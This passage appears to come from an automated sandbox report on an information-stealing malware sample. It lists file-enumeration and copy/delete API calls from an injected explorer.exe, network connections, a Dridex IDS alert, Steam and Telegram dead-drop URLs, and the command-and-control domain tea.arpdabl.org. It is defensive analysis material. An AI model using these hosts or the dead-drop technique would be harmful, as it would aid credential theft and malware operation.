Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_004374B6 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA, 9_2_004374B6
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_004365F0 wsprintfA,FindFirstFileA,memset,memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,memset,lstrcatA,strtok_s,strtok_s,memset,lstrcatA,strtok_s,PathMatchSpecA,DeleteFileA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,strtok_s,FindNextFileA,FindClose, 9_2_004365F0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_0042D690 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose, 9_2_0042D690
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_00436EA6 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose, 9_2_00436EA6
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_0042C6B5 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA, 9_2_0042C6B5
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_00429FC0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 9_2_00429FC0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_00436B15 GetLogicalDriveStringsA,memset,GetDriveTypeA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA, 9_2_00436B15

Networking

barindex
Source: C:\Windows\SysWOW64\explorer.exe Network Connect: 149.154.167.99 443 Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Network Connect: 65.21.246.249 443 Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Network Connect: 104.102.49.254 443 Jump to behavior
Source: Malware configuration extractor URLs: https://steamcommunity.com/profiles/76561199735694209
Source: global traffic HTTP traffic detected: GET /profiles/76561199735694209 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /puffclou HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache
Source: Joe Sandbox View IP Address: 65.21.246.249 65.21.246.249
Source: Joe Sandbox View IP Address: 104.102.49.254 104.102.49.254
Source: Joe Sandbox View IP Address: 149.154.167.99 149.154.167.99
Source: Joe Sandbox View IP Address: 149.154.167.99 149.154.167.99
Source: Joe Sandbox View ASN Name: CP-ASDE CP-ASDE
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: Network traffic Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:49877 -> 65.21.246.249:443
Source: unknown TCP traffic detected without corresponding DNS query: 65.21.246.249
Source: unknown TCP traffic detected without corresponding DNS query: 65.21.246.249
Source: unknown TCP traffic detected without corresponding DNS query: 65.21.246.249
Source: unknown TCP traffic detected without corresponding DNS query: 65.21.246.249
Source: unknown TCP traffic detected without corresponding DNS query: 65.21.246.249
Source: unknown TCP traffic detected without corresponding DNS query: 65.21.246.249
Source: unknown TCP traffic detected without corresponding DNS query: 65.21.246.249
Source: unknown TCP traffic detected without corresponding DNS query: 65.21.246.249
Source: unknown TCP traffic detected without corresponding DNS query: 65.21.246.249
Source: unknown TCP traffic detected without corresponding DNS query: 65.21.246.249
Source: unknown TCP traffic detected without corresponding DNS query: 65.21.246.249
Source: unknown TCP traffic detected without corresponding DNS query: 65.21.246.249
Source: unknown TCP traffic detected without corresponding DNS query: 65.21.246.249
Source: unknown TCP traffic detected without corresponding DNS query: 65.21.246.249
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_004258C4 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,lstrlenA,lstrlenA,GetProcessHeap,HeapAlloc,lstrlenA,memcpy,lstrlenA,lstrlenA,memcpy,lstrlenA,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle, 9_2_004258C4
Source: global traffic HTTP traffic detected: GET /profiles/76561199735694209 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /puffclou HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache
Source: explorer.exe, 00000009.00000003.2450943616.00000000035B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://steamloopback.host https://store.steampowered.com/; equals www.youtube.com (Youtube)
Source: global traffic DNS traffic detected: DNS query: steamcommunity.com
Source: global traffic DNS traffic detected: DNS query: t.me
Source: global traffic DNS traffic detected: DNS query: tea.arpdabl.org
Source: explorer.exe, 00000009.00000003.2450943616.00000000035B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://127.0.0.1:27060
Source: livecall.exe, 00000003.00000002.2195560653.00000000026A3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://c0rl.m%L
Source: oracleSuper.exe, 00000000.00000002.2192910487.00000000044D6000.00000004.00000020.00020000.00000000.sdmp, livecall.exe, 00000002.00000002.2171255132.00000000027C7000.00000004.00000020.00020000.00000000.sdmp, livecall.exe, 00000003.00000002.2195675297.00000000027A7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2407010771.0000000004FBD000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2541254560.0000000003476000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCA-1.crt0
Source: oracleSuper.exe, 00000000.00000002.2192910487.00000000044D6000.00000004.00000020.00020000.00000000.sdmp, livecall.exe, 00000002.00000002.2171255132.00000000027C7000.00000004.00000020.00020000.00000000.sdmp, livecall.exe, 00000003.00000002.2195675297.00000000027A7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2407010771.0000000004FBD000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2541254560.0000000003476000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCodeSigningCA-1.crt0
Source: oracleSuper.exe, 00000000.00000002.2192910487.00000000044D6000.00000004.00000020.00020000.00000000.sdmp, livecall.exe, 00000002.00000002.2171255132.00000000027C7000.00000004.00000020.00020000.00000000.sdmp, livecall.exe, 00000003.00000002.2195675297.00000000027A7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2407010771.0000000004FBD000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2541254560.0000000003476000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: oracleSuper.exe, 00000000.00000002.2192910487.00000000044D6000.00000004.00000020.00020000.00000000.sdmp, livecall.exe, 00000002.00000002.2171255132.00000000027C7000.00000004.00000020.00020000.00000000.sdmp, livecall.exe, 00000003.00000002.2195675297.00000000027A7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2407010771.0000000004FBD000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2541254560.0000000003476000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: livecall.exe, livecall.exe, 00000003.00000002.2196853032.0000000027501000.00000020.00000001.01000000.0000000A.sdmp, msidcrl40.dll.0.dr, msidcrl40.dll.2.dr String found in binary or memory: http://clientconfig.passport.net
Source: oracleSuper.exe String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: oracleSuper.exe String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: oracleSuper.exe String found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
Source: oracleSuper.exe String found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
Source: oracleSuper.exe String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y
Source: oracleSuper.exe String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
Source: livecall.exe, 00000002.00000002.2170794946.000000000079D000.00000004.00000020.00020000.00000000.sdmp, livecall.exe, 00000003.00000002.2195560653.00000000026A3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.co(m/D
Source: oracleSuper.exe, 00000000.00000002.2192910487.00000000044D6000.00000004.00000020.00020000.00000000.sdmp, livecall.exe, 00000002.00000002.2171255132.00000000027C7000.00000004.00000020.00020000.00000000.sdmp, livecall.exe, 00000003.00000002.2195675297.00000000027A7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2407010771.0000000004FBD000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2541254560.0000000003476000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDCA-1.crl08
Source: oracleSuper.exe, 00000000.00000002.2192910487.00000000044D6000.00000004.00000020.00020000.00000000.sdmp, livecall.exe, 00000002.00000002.2171255132.00000000027C7000.00000004.00000020.00020000.00000000.sdmp, livecall.exe, 00000003.00000002.2195675297.00000000027A7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2407010771.0000000004FBD000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2541254560.0000000003476000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: oracleSuper.exe, 00000000.00000002.2192910487.00000000044D6000.00000004.00000020.00020000.00000000.sdmp, livecall.exe, 00000002.00000002.2171255132.00000000027C7000.00000004.00000020.00020000.00000000.sdmp, livecall.exe, 00000003.00000002.2195675297.00000000027A7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2407010771.0000000004FBD000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2541254560.0000000003476000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: oracleSuper.exe, 00000000.00000002.2192910487.00000000044D6000.00000004.00000020.00020000.00000000.sdmp, livecall.exe, 00000002.00000002.2171255132.00000000027C7000.00000004.00000020.00020000.00000000.sdmp, livecall.exe, 00000003.00000002.2195675297.00000000027A7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2407010771.0000000004FBD000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2541254560.0000000003476000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/assured-cs-g1.crl00
Source: oracleSuper.exe, 00000000.00000002.2192910487.00000000044D6000.00000004.00000020.00020000.00000000.sdmp, livecall.exe, 00000002.00000002.2171255132.00000000027C7000.00000004.00000020.00020000.00000000.sdmp, livecall.exe, 00000003.00000002.2195675297.00000000027A7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2407010771.0000000004FBD000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2541254560.0000000003476000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: oracleSuper.exe, 00000000.00000002.2192910487.00000000044D6000.00000004.00000020.00020000.00000000.sdmp, livecall.exe, 00000002.00000002.2171255132.00000000027C7000.00000004.00000020.00020000.00000000.sdmp, livecall.exe, 00000003.00000002.2195675297.00000000027A7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2407010771.0000000004FBD000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2541254560.0000000003476000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDCA-1.crl0w
Source: oracleSuper.exe, 00000000.00000002.2192910487.00000000044D6000.00000004.00000020.00020000.00000000.sdmp, livecall.exe, 00000002.00000002.2171255132.00000000027C7000.00000004.00000020.00020000.00000000.sdmp, livecall.exe, 00000003.00000002.2195675297.00000000027A7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2407010771.0000000004FBD000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2541254560.0000000003476000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: oracleSuper.exe, 00000000.00000002.2192910487.00000000044D6000.00000004.00000020.00020000.00000000.sdmp, livecall.exe, 00000002.00000002.2171255132.00000000027C7000.00000004.00000020.00020000.00000000.sdmp, livecall.exe, 00000003.00000002.2195675297.00000000027A7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2407010771.0000000004FBD000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2541254560.0000000003476000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: oracleSuper.exe, 00000000.00000002.2192910487.00000000044D6000.00000004.00000020.00020000.00000000.sdmp, livecall.exe, 00000002.00000002.2171255132.00000000027C7000.00000004.00000020.00020000.00000000.sdmp, livecall.exe, 00000003.00000002.2195675297.00000000027A7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2407010771.0000000004FBD000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2541254560.0000000003476000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/assured-cs-g1.crl0L
Source: oracleSuper.exe, 00000000.00000002.2192910487.00000000044D6000.00000004.00000020.00020000.00000000.sdmp, livecall.exe, 00000002.00000002.2171255132.00000000027C7000.00000004.00000020.00020000.00000000.sdmp, livecall.exe, 00000003.00000002.2195675297.00000000027A7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2407010771.0000000004FBD000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2541254560.0000000003476000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: oracleSuper.exe String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#
Source: oracleSuper.exe String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
Source: msidcrl40.dll.2.dr String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
Source: livecall.exe, livecall.exe, 00000003.00000002.2196853032.0000000027501000.00000020.00000001.01000000.0000000A.sdmp, msidcrl40.dll.0.dr, msidcrl40.dll.2.dr String found in binary or memory: http://docs.oasis-open.org/wss/2004/XX/oasis-2004XX-wss-saml-token-profile-1.0#SAMLAssertionID
Source: oracleSuper.exe, 00000000.00000002.2192910487.000000000417D000.00000004.00000020.00020000.00000000.sdmp, livecall.exe.0.dr, livecall.exe.2.dr String found in binary or memory: http://messenger.live.com
Source: oracleSuper.exe String found in binary or memory: http://ocsp.comodoca.com0
Source: oracleSuper.exe, 00000000.00000002.2192910487.00000000044D6000.00000004.00000020.00020000.00000000.sdmp, livecall.exe, 00000002.00000002.2171255132.00000000027C7000.00000004.00000020.00020000.00000000.sdmp, livecall.exe, 00000003.00000002.2195675297.00000000027A7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2407010771.0000000004FBD000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2541254560.0000000003476000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0A
Source: oracleSuper.exe, 00000000.00000002.2192910487.00000000044D6000.00000004.00000020.00020000.00000000.sdmp, livecall.exe, 00000002.00000002.2171255132.00000000027C7000.00000004.00000020.00020000.00000000.sdmp, livecall.exe, 00000003.00000002.2195675297.00000000027A7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2407010771.0000000004FBD000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2541254560.0000000003476000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0C
Source: oracleSuper.exe, 00000000.00000002.2192910487.00000000044D6000.00000004.00000020.00020000.00000000.sdmp, livecall.exe, 00000002.00000002.2171255132.00000000027C7000.00000004.00000020.00020000.00000000.sdmp, livecall.exe, 00000003.00000002.2195675297.00000000027A7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2407010771.0000000004FBD000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2541254560.0000000003476000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0L
Source: oracleSuper.exe, 00000000.00000002.2192910487.00000000044D6000.00000004.00000020.00020000.00000000.sdmp, livecall.exe, 00000002.00000002.2171255132.00000000027C7000.00000004.00000020.00020000.00000000.sdmp, livecall.exe, 00000003.00000002.2195675297.00000000027A7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2407010771.0000000004FBD000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2541254560.0000000003476000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0O
Source: oracleSuper.exe String found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
Source: oracleSuper.exe String found in binary or memory: http://ocsp.sectigo.com0
Source: oracleSuper.exe String found in binary or memory: http://ocsp2.globalsign.com/rootr606
Source: oracleSuper.exe, 00000000.00000002.2192910487.00000000044D6000.00000004.00000020.00020000.00000000.sdmp, livecall.exe, 00000002.00000002.2171255132.00000000027C7000.00000004.00000020.00020000.00000000.sdmp, livecall.exe, 00000003.00000002.2195675297.00000000027A7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2407010771.0000000004FBD000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2541254560.0000000003476000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
Source: oracleSuper.exe, 00000000.00000002.2192910487.00000000044D6000.00000004.00000020.00020000.00000000.sdmp, livecall.exe, 00000002.00000002.2171255132.00000000027C7000.00000004.00000020.00020000.00000000.sdmp, livecall.exe, 00000003.00000002.2195675297.00000000027A7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2407010771.0000000004FBD000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2541254560.0000000003476000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://s2.symcb.com0
Source: msidcrl40.dll.2.dr String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: livecall.exe String found in binary or memory: http://schemas.xmlsoap.org/ws/2002/12/poli
Source: msidcrl40.dll.2.dr String found in binary or memory: http://schemas.xmlsoap.org/ws/2002/12/policy
Source: msidcrl40.dll.2.dr String found in binary or memory: http://schemas.xmlsoap.org/ws/2003/06/secext
Source: livecall.exe String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/0
Source: msidcrl40.dll.2.dr String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/03/addressing
Source: msidcrl40.dll.2.dr String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/sc
Source: msidcrl40.dll.2.dr String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Issue
Source: msidcrl40.dll.2.dr String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust
Source: oracleSuper.exe String found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
Source: explorer.exe, 00000009.00000003.2529963608.00000000035B1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2541375791.00000000035AB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2540314947.0000000000465000.00000004.00000001.01000000.00000000.sdmp, 76561199735694209[1].htm.9.dr String found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
Source: explorer.exe, 00000009.00000003.2529963608.00000000035B1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2541375791.00000000035AB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2540314947.0000000000465000.00000004.00000001.01000000.00000000.sdmp, 76561199735694209[1].htm.9.dr String found in binary or memory: http://store.steampowered.com/privacy_agreement/
Source: explorer.exe, 00000009.00000003.2529963608.00000000035B1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2541375791.00000000035AB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2540314947.0000000000465000.00000004.00000001.01000000.00000000.sdmp, 76561199735694209[1].htm.9.dr String found in binary or memory: http://store.steampowered.com/subscriber_agreement/
Source: oracleSuper.exe, 00000000.00000002.2192910487.00000000044D6000.00000004.00000020.00020000.00000000.sdmp, livecall.exe, 00000002.00000002.2171255132.00000000027C7000.00000004.00000020.00020000.00000000.sdmp, livecall.exe, 00000003.00000002.2195675297.00000000027A7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2407010771.0000000004FBD000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2541254560.0000000003476000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://sv.symcb.com/sv.crl0a
Source: oracleSuper.exe, 00000000.00000002.2192910487.00000000044D6000.00000004.00000020.00020000.00000000.sdmp, livecall.exe, 00000002.00000002.2171255132.00000000027C7000.00000004.00000020.00020000.00000000.sdmp, livecall.exe, 00000003.00000002.2195675297.00000000027A7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2407010771.0000000004FBD000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2541254560.0000000003476000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://sv.symcb.com/sv.crt0
Source: oracleSuper.exe, 00000000.00000002.2192910487.00000000044D6000.00000004.00000020.00020000.00000000.sdmp, livecall.exe, 00000002.00000002.2171255132.00000000027C7000.00000004.00000020.00020000.00000000.sdmp, livecall.exe, 00000003.00000002.2195675297.00000000027A7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2407010771.0000000004FBD000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2541254560.0000000003476000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://sv.symcd.com0&
Source: explorer.exe, 00000009.00000002.2540314947.00000000005E9000.00000004.00000001.01000000.00000000.sdmp String found in binary or memory: http://tea.arp
Source: explorer.exe, 00000009.00000002.2540314947.00000000005E9000.00000004.00000001.01000000.00000000.sdmp String found in binary or memory: http://tea.arpdabl
Source: explorer.exe, 00000009.00000002.2540314947.00000000005E9000.00000004.00000001.01000000.00000000.sdmp String found in binary or memory: http://tea.arpdabl.
Source: explorer.exe, 00000009.00000002.2540314947.00000000005E9000.00000004.00000001.01000000.00000000.sdmp String found in binary or memory: http://tea.arpdabl.org
Source: explorer.exe, 00000009.00000002.2541375791.00000000035AB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2541375791.0000000003585000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://tea.arpdabl.org/
Source: explorer.exe, 00000009.00000002.2541375791.0000000003585000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://tea.arpdabl.org/.
Source: explorer.exe, 00000009.00000002.2541375791.0000000003585000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://tea.arpdabl.org/:
Source: explorer.exe, 00000009.00000002.2541375791.00000000035AB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://tea.arpdabl.org/Yo
Source: explorer.exe, 00000009.00000002.2540314947.00000000005E9000.00000004.00000001.01000000.00000000.sdmp String found in binary or memory: http://tea.arpdabl.orgxe
Source: explorer.exe, 00000009.00000002.2540314947.00000000005E9000.00000004.00000001.01000000.00000000.sdmp String found in binary or memory: http://tea.arpdabl.s.exe
Source: explorer.exe, 00000009.00000002.2540314947.00000000005E9000.00000004.00000001.01000000.00000000.sdmp String found in binary or memory: http://tea.arpdablss.exe
Source: explorer.exe, 00000009.00000002.2540314947.00000000005E9000.00000004.00000001.01000000.00000000.sdmp String found in binary or memory: http://tea.arpy
Source: explorer.exe, 00000009.00000002.2540314947.00000000005E9000.00000004.00000001.01000000.00000000.sdmp String found in binary or memory: http://tea.stry
Source: oracleSuper.exe, 00000000.00000002.2192910487.00000000044D6000.00000004.00000020.00020000.00000000.sdmp, livecall.exe, 00000002.00000002.2171255132.00000000027C7000.00000004.00000020.00020000.00000000.sdmp, livecall.exe, 00000003.00000002.2195675297.00000000027A7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2407010771.0000000004FBD000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2541254560.0000000003476000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
Source: oracleSuper.exe, 00000000.00000002.2192910487.000000000448B000.00000004.00000020.00020000.00000000.sdmp, livecall.exe, 00000002.00000002.2171255132.0000000002771000.00000004.00000020.00020000.00000000.sdmp, livecall.exe, 00000003.00000002.2195675297.0000000002751000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2407010771.0000000004F75000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2541254560.000000000342E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.info-zip.org/
Source: oracleSuper.exe, 00000000.00000002.2192910487.000000000448B000.00000004.00000020.00020000.00000000.sdmp, msidcrl40.dll.0.dr, msidcrl40.dll.2.dr String found in binary or memory: http://www.passport.net/0
Source: oracleSuper.exe, 00000000.00000002.2192910487.00000000044D6000.00000004.00000020.00020000.00000000.sdmp, livecall.exe, 00000002.00000002.2171255132.00000000027C7000.00000004.00000020.00020000.00000000.sdmp, livecall.exe, 00000003.00000002.2195675297.00000000027A7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2407010771.0000000004FBD000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2541254560.0000000003476000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.symauth.com/cps0(
Source: oracleSuper.exe, 00000000.00000002.2192910487.00000000044D6000.00000004.00000020.00020000.00000000.sdmp, livecall.exe, 00000002.00000002.2171255132.00000000027C7000.00000004.00000020.00020000.00000000.sdmp, livecall.exe, 00000003.00000002.2195675297.00000000027A7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2407010771.0000000004FBD000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2541254560.0000000003476000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.symauth.com/rpa00
Source: explorer.exe, 00000009.00000002.2540314947.0000000000465000.00000004.00000001.01000000.00000000.sdmp, 76561199735694209[1].htm.9.dr String found in binary or memory: http://www.valvesoftware.com/legal.htm
